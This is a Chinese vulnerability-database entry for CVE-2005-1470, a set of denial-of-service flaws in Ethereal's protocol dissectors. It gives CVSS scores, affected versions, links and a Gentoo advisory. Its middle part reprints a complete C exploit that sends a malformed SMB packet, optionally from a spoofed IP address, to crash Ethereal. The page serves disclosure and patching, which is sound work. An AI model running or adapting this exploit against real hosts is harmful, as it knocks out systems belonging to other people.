CVE-2005-1470
CVSS5.0
发布时间 :2005-05-05 00:00:00
修订时间 :2010-08-21 00:28:55
NMCOEP    

[原文]Multiple unknown vulnerabilities in the (1) TZSP, (2) MGCP, (3) ISUP, (4) SMB, or (5) Bittorrent dissectors in Ethereal before 0.10.11 allow remote attackers to cause a denial of service (segmentation fault) via unknown vectors.


[CNNVD]Ethereal多个协议分析处理模块漏洞(CNNVD-200505-914)

        Ethereal是一款非常流行的网络协议分析工具。
        Ethereal厂商报告了各种协议处理模块中的多个漏洞,包括:
         - 缓冲区溢出漏洞
         - 格式串漏洞
         - 空指针引用拒绝服务漏洞
         - 分段错误拒绝服务漏洞
         - 死循环漏洞
         - 内存耗尽拒绝服务漏洞
         - 双重释放漏洞
         - 未明的拒绝服务漏洞
        这些漏洞可能允许远程攻击者执行任意代码或导致受影响的应用程序崩溃。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ethereal_group:ethereal:0.10.8
cpe:/a:ethereal_group:ethereal:0.9.8
cpe:/a:ethereal_group:ethereal:0.10.9
cpe:/a:ethereal_group:ethereal:0.9
cpe:/a:ethereal_group:ethereal:0.9.11
cpe:/a:ethereal_group:ethereal:0.9.16
cpe:/a:ethereal_group:ethereal:0.9.2
cpe:/a:ethereal_group:ethereal:0.9.4
cpe:/a:ethereal_group:ethereal:0.9.5
cpe:/a:ethereal_group:ethereal:0.10.10
cpe:/a:ethereal_group:ethereal:0.8.14
cpe:/a:ethereal_group:ethereal:0.10.1
cpe:/a:ethereal_group:ethereal:0.10.7
cpe:/a:ethereal_group:ethereal:0.10.2
cpe:/a:ethereal_group:ethereal:0.9.12
cpe:/a:ethereal_group:ethereal:0.8
cpe:/a:ethereal_group:ethereal:0.9.15
cpe:/a:ethereal_group:ethereal:0.9.3
cpe:/a:ethereal_group:ethereal:0.10.4
cpe:/a:ethereal_group:ethereal:0.8.15
cpe:/a:ethereal_group:ethereal:0.10.5
cpe:/a:ethereal_group:ethereal:0.10.3
cpe:/a:ethereal_group:ethereal:0.9.7
cpe:/a:ethereal_group:ethereal:0.9.9
cpe:/a:ethereal_group:ethereal:0.9.14
cpe:/a:ethereal_group:ethereal:0.9.10
cpe:/a:ethereal_group:ethereal:0.10.6
cpe:/a:ethereal_group:ethereal:0.9.13
cpe:/a:ethereal_group:ethereal:0.8.18
cpe:/a:ethereal_group:ethereal:0.8.13
cpe:/a:ethereal_group:ethereal:0.9.1
cpe:/a:ethereal_group:ethereal:0.8.19
cpe:/a:ethereal_group:ethereal:0.9.6
cpe:/a:ethereal_group:ethereal:0.10

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:11804Multiple unknown vulnerabilities in the (1) TZSP, (2) MGCP, (3) ISUP, (4) SMB, or (5) Bittorrent dissectors in Ethereal before 0.10.11 allow...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1470
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1470
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-914
(官方数据源) CNNVD

- 其它链接及资源

http://www.ethereal.com/news/item_20050504_01.html
(VENDOR_ADVISORY)  CONFIRM  http://www.ethereal.com/news/item_20050504_01.html
http://www.ethereal.com/appnotes/enpa-sa-00019.html
(VENDOR_ADVISORY)  CONFIRM  http://www.ethereal.com/appnotes/enpa-sa-00019.html
http://www.securityfocus.com/bid/13504
(UNKNOWN)  BID  13504
http://www.redhat.com/support/errata/RHSA-2005-427.html
(UNKNOWN)  REDHAT  RHSA-2005:427
http://www.redhat.com/archives/fedora-legacy-announce/2006-January/msg00003.html
(UNKNOWN)  FEDORA  FLSA-2006:152922
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000963
(UNKNOWN)  CONECTIVA  CLSA-2005:963

- 漏洞信息

Ethereal多个协议分析处理模块漏洞
中危 设计错误
2005-05-05 00:00:00 2005-10-20 00:00:00
远程  
        Ethereal是一款非常流行的网络协议分析工具。
        Ethereal厂商报告了各种协议处理模块中的多个漏洞,包括:
         - 缓冲区溢出漏洞
         - 格式串漏洞
         - 空指针引用拒绝服务漏洞
         - 分段错误拒绝服务漏洞
         - 死循环漏洞
         - 内存耗尽拒绝服务漏洞
         - 双重释放漏洞
         - 未明的拒绝服务漏洞
        这些漏洞可能允许远程攻击者执行任意代码或导致受影响的应用程序崩溃。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        http://www.ethereal.com/distribution/ethereal-0.10.11.tar.gz
        http://security.gentoo.org/glsa/glsa-200505-03.xml

- 漏洞信息 (984)

Ethereal <= 0.10.10 (dissect_ipc_state) Remote Denial of Service Exploit (EDBID:984)
multiple dos
2005-05-07 Verified
0 Nicob
N/A [点击下载]
/*****************************************************************/
/*                                                               */
/* Ethereal <= 0.10.10 dissect_ipc_state() DoS                   */
/* Tested on 0.9.4 and 0.10.10                                   */
/*                                                               */
/* Bug found by the Ethereal BuildBot                            */
/* Code ripped from vade79                                       */
/* Exploit by Nicob <nicob@nicob.net>                            */
/*                                                               */
/* From the Ethereal Security Advisory #19 :                     */
/* http://www.ethereal.com/appnotes/enpa-sa-00019.html           */
/*                                                               */
/* "The SMB dissector could cause a segmentation fault and throw */
/* assertions. Versions affected: 0.9.0 to 0.10.10"              */
/*                                                               */
/*****************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#ifdef _USE_ARPA
#include <arpa/inet.h>
#endif

/* doesn't seem to be standardized, so... */
#if defined(__BYTE_ORDER) && !defined(BYTE_ORDER)
#define BYTE_ORDER __BYTE_ORDER
#endif
#if defined(__BIG_ENDIAN) && !defined(BIG_ENDIAN)
#define BIG_ENDIAN __BIG_ENDIAN
#endif
#if defined(BYTE_ORDER) && defined(BIG_ENDIAN)
#if BYTE_ORDER == BIG_ENDIAN
#define _USE_BIG_ENDIAN
#endif
#endif

/* will never need to be changed. */
#define SMB_PORT 138

/* avoid platform-specific header madness. */
/* (just plucked out of header files) */
struct iph{
#ifdef _USE_BIG_ENDIAN
unsigned char version:4,ihl:4;
#else
unsigned char ihl:4,version:4;
#endif
unsigned char tos;
unsigned short tot_len;
unsigned short id;
unsigned short frag_off;
unsigned char ttl;
unsigned char protocol;
unsigned short check;
unsigned int saddr;
unsigned int daddr;
};
struct udph{
unsigned short source;
unsigned short dest;
unsigned short len;
unsigned short check;
};
struct sumh{
unsigned int saddr;
unsigned int daddr;
unsigned char fill;
unsigned char protocol;
unsigned short len;
};

/* malformed SMB data. (the bug) */
static char payload[]=
"\x11\x1a\x69\xb8\x0a\x02\x0f\x3d\x00\x8a\x00"
"\xbb\x00\x00\x20\x46\x45\x45\x4a\x45\x43\x46\x46\x46\x43\x45\x50\x45\x4b\x43"
"\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x00\x20"
"\x45\x44\x45\x43\x46\x45\x46\x46\x46\x44\x45\x42\x43\x41\x43\x41\x43\x41\x43"
"\x41\x43\x41\x43\x41\x43\x49\x43\x41\x43\x41\x42\x4e\x00\xff\x53\x4d\x42\x25"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x21\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xe8\x03\x00\x00\x36\x00\x00\x00\x00\x00\x21\x00\x56\x00\x03\x00\x01"
"\x00\x00\x00\x02\x00\x32\x00\x5c\x4d\x41\x49\x4c\x53\x4c\x4f\x54\xb3\x42\x52"
"\x4f\x57\x4e\x45\x00\x01\x00\x80\xfc\x0a\x00\x5f\x4e\x49\x43\x4f\x42\x5f\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x07\x90\x01\x00\x0f\x01\x55";

/* prototypes. (and sig_alarm) */
void nbt_nospoof(unsigned int);
void nbt_spoof(unsigned int,unsigned int);
unsigned short in_cksum(unsigned short *,signed int);
unsigned int getip(char *);
void printe(char *,signed char);
void sig_alarm(){printe("alarm/timeout hit.",1);}

/* begin. */
int main(int argc,char **argv) {
unsigned char nospoof=0;
unsigned int daddr=0,saddr=0;
printf("\n[*] Ethereal <= 0.10.10 SMB DoS.\n[*] by Nicob (code ripped from vade79)\n\n");
if(argc<2){
printf("[*] syntax: %s <dst host> [src host(0=random)]\n",
argv[0]);
printf("[*] syntax: %s <dst host> nospoof\n",argv[0]);
exit(1);
}
if(!(daddr=getip(argv[1])))
printe("invalid destination host/ip.",1);
if(argc>2){
if(strstr(argv[2],"nospoof"))nospoof=1;
else saddr=getip(argv[2]);
}
printf("[*] destination\t: %s\n",argv[1]);
if(!nospoof)
printf("[*] source\t: %s (spoofed)\n",(saddr?argv[2]:"<random>"));
else
printf("[*] source\t: real IP\n");
printf("[+] sending packet ...");
fflush(stdout);
srandom(time(0));
if(nospoof)nbt_nospoof(daddr);
else nbt_spoof(daddr,saddr);
printf(".");
fflush(stdout);
printf("\n[*] done.\n\n");
fflush(stdout);
exit(0);
}
/* (non-spoofed) sends a (SMB) udp packet. */
void nbt_nospoof(unsigned int daddr){
signed int sock;
struct sockaddr_in sa;
sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);
sa.sin_family=AF_INET;
sa.sin_port=htons(SMB_PORT);
sa.sin_addr.s_addr=daddr;
if(sendto(sock,payload,sizeof(payload)-1,0,(struct sockaddr *)&sa,
sizeof(struct sockaddr))<sizeof(payload)-1)
printe("failed to send non-spoofed SMB packet.",1);
close(sock);
return;
}
/* (spoofed) generates and sends a (SMB) udp packet. */
void nbt_spoof(unsigned int daddr,unsigned int saddr){
signed int sock=0,on=1;
unsigned int psize=0;
char *p,*s;
struct sockaddr_in sa;
struct iph ip;
struct udph udp;
struct sumh sum;
/* create raw (UDP) socket. */
if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_UDP))<0)
printe("could not allocate raw socket.",1);
/* allow (on some systems) for the user-supplied ip header. */
#ifdef IP_HDRINCL
if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)))
printe("could not set IP_HDRINCL socket option.",1);
#endif
sa.sin_family=AF_INET;
sa.sin_port=htons(SMB_PORT);
sa.sin_addr.s_addr=daddr;
psize=(sizeof(struct iph)+sizeof(struct udph)+sizeof(payload)-1);
memset(&ip,0,sizeof(struct iph));
memset(&udp,0,sizeof(struct udph));
/* values not filled = 0, from the memset() above. */
ip.ihl=5;
ip.version=4;
ip.tot_len=htons(psize);
ip.saddr=(saddr?saddr:random()%0xffffffff);
ip.daddr=daddr;
ip.ttl=(64*(random()%2+1));
ip.protocol=IPPROTO_UDP;
ip.frag_off=64;
udp.source=htons(SMB_PORT);
udp.dest=htons(SMB_PORT);
udp.len=htons(sizeof(struct udph)+sizeof(payload)-1);
/* needed for (correct) checksums. */
sum.saddr=ip.saddr;
sum.daddr=ip.daddr;
sum.fill=0;
sum.protocol=ip.protocol;
sum.len=htons(sizeof(struct udph)+sizeof(payload)-1);
/* make sum/calc buffer for the udp checksum. (correct) */
if(!(s=(char *)malloc(sizeof(struct sumh)+sizeof(struct udph)
+sizeof(payload)+1)))
printe("malloc() failed.",1);
memset(s,0,(sizeof(struct sumh)+sizeof(struct udph)
+sizeof(payload)+1));
memcpy(s,&sum,sizeof(struct sumh));
memcpy(s+sizeof(struct sumh),&udp,sizeof(struct udph));
memcpy(s+sizeof(struct sumh)+sizeof(struct udph),
payload,sizeof(payload)-1);
udp.check=in_cksum((unsigned short *)s,
sizeof(struct sumh)+sizeof(struct udph)+sizeof(payload)-1);
free(s);
/* make sum/calc buffer for the ip checksum. (correct) */
if(!(s=(char *)malloc(sizeof(struct iph)+1)))
printe("malloc() failed.",1);
memset(s,0,(sizeof(struct iph)+1));
memcpy(s,&ip,sizeof(struct iph));
ip.check=in_cksum((unsigned short *)s,sizeof(struct iph));
free(s);
/* put the packet together. */
if(!(p=(char *)malloc(psize+1)))
printe("malloc() failed.",1);
memset(p,0,psize);
memcpy(p,&ip,sizeof(struct iph));
memcpy(p+sizeof(struct iph),&udp,sizeof(struct udph));
memcpy(p+(sizeof(struct iph)+sizeof(struct udph)),
payload,sizeof(payload));
/* send the malformed SMB packet. */
if(sendto(sock,p,psize,0,(struct sockaddr *)&sa,
sizeof(struct sockaddr))<psize)
printe("failed to send forged SMB packet.",1);
free(p);
return;
}
/* standard method for creating TCP/IP checksums. */
unsigned short in_cksum(unsigned short *addr,signed int len){
unsigned short answer=0;
register unsigned short *w=addr;
register int nleft=len,sum=0;
while(nleft>1){
sum+=*w++;
nleft-=2;
}
if(nleft==1){
*(unsigned char *)(&answer)=*(unsigned char *)w;
sum+=answer;
}
sum=(sum>>16)+(sum&0xffff);
sum+=(sum>>16);
answer=~sum;
return(answer);
}
/* gets the ip from a host/ip/numeric. */
unsigned int getip(char *host){
struct hostent *t;
unsigned int s=0;
if((s=inet_addr(host))){
if((t=gethostbyname(host)))
memcpy((char *)&s,(char *)t->h_addr,sizeof(s));
}
if(s==-1)s=0;
return(s);
}
/* all-purpose error/exit function. */
void printe(char *err,signed char e){
printf("[!] %s\n",err);
if(e)exit(e);
return;
}

// milw0rm.com [2005-05-07]
		

- 漏洞信息 (F38410)

Gentoo Linux Security Advisory 200505-3 (PacketStormID:F38410)
2005-07-02 00:00:00
Gentoo  security.gentoo.org
advisory,arbitrary,vulnerability
linux,gentoo
CVE-2005-1456,CVE-2005-1457,CVE-2005-1458,CVE-2005-1459,CVE-2005-1460,CVE-2005-1461,CVE-2005-1462,CVE-2005-1463,CVE-2005-1464,CVE-2005-1465,CVE-2005-1466,CVE-2005-1467,CVE-2005-1468,CVE-2005-1469,CVE-2005-1470
[点击下载]

Gentoo Linux Security Advisory GLSA 200505-03 - Ethereal is vulnerable to numerous vulnerabilities potentially resulting in the execution of arbitrary code or abnormal termination. Versions less than 0.10.11 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200505-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Ethereal: Numerous vulnerabilities
      Date: May 06, 2005
      Bugs: #90539
        ID: 200505-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Ethereal is vulnerable to numerous vulnerabilities potentially
resulting in the execution of arbitrary code or abnormal termination.

Background
==========

Ethereal is a feature rich network protocol analyzer.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  net-analyzer/ethereal      < 0.10.11                   >= 0.10.11

Description
===========

There are numerous vulnerabilities in versions of Ethereal prior to
0.10.11, including:

* The ANSI A and DHCP dissectors are vulnerable to format string
  vulnerabilities.

* The DISTCC, FCELS, SIP, ISIS, CMIP, CMP, CMS, CRMF, ESS, OCSP,
  PKIX1Explitit, PKIX Qualified, X.509, Q.931, MEGACO, NCP, ISUP, TCAP
  and Presentation dissectors are vulnerable to buffer overflows.

* The KINK, WSP, SMB Mailslot, H.245, MGCP, Q.931, RPC, GSM and SMB
  NETLOGON dissectors are vulnerable to pointer handling errors.

* The LMP, KINK, MGCP, RSVP, SRVLOC, EIGRP, MEGACO, DLSw, NCP and
  L2TP dissectors are vulnerable to looping problems.

* The Telnet and DHCP dissectors could abort.

* The TZSP, Bittorrent, SMB, MGCP and ISUP dissectors could cause a
  segmentation fault.

* The WSP, 802.3 Slow protocols, BER, SMB Mailslot, SMB, NDPS, IAX2,
  RADIUS, SMB PIPE, MRDISC and TCAP dissectors could throw assertions.

* The DICOM, NDPS and ICEP dissectors are vulnerable to memory
  handling errors.

* The GSM MAP, AIM, Fibre Channel,SRVLOC, NDPS, LDAP and NTLMSSP
  dissectors could terminate abnormallly.

Impact
======

An attacker might be able to use these vulnerabilities to crash
Ethereal and execute arbitrary code with the permissions of the user
running Ethereal, which could be the root user.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Ethereal users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-analyzer/ethereal-0.10.11"

References
==========

  [ 1 ] Ethereal enpa-sa-00019
        http://www.ethereal.com/appnotes/enpa-sa-00019.html
  [ 2 ] CAN-2005-1456
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1456
  [ 3 ] CAN-2005-1457
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1457
  [ 4 ] CAN-2005-1458
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1458
  [ 5 ] CAN-2005-1459
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1459
  [ 6 ] CAN-2005-1460
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1460
  [ 7 ] CAN-2005-1461
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1461
  [ 8 ] CAN-2005-1462
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1462
  [ 9 ] CAN-2005-1463
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1463
  [ 10 ] CAN-2005-1464
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1464
  [ 11 ] CAN-2005-1465
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1465
  [ 12 ] CAN-2005-1466
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1466
  [ 13 ] CAN-2005-1467
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1467
  [ 14 ] CAN-2005-1468
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1468
  [ 15 ] CAN-2005-1469
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1469
  [ 16 ] CAN-2005-1470
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1470

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200505-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
    

- 漏洞信息

16104
Ethereal TZSP Dissector Unspecified Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Unknown

- 漏洞描述

Ethereal contains a flaw related to the TZSP dissector that may allow an attacker to cause a denial of service. No further details have been provided.

- 时间线

2005-05-04 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 0.10.11 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站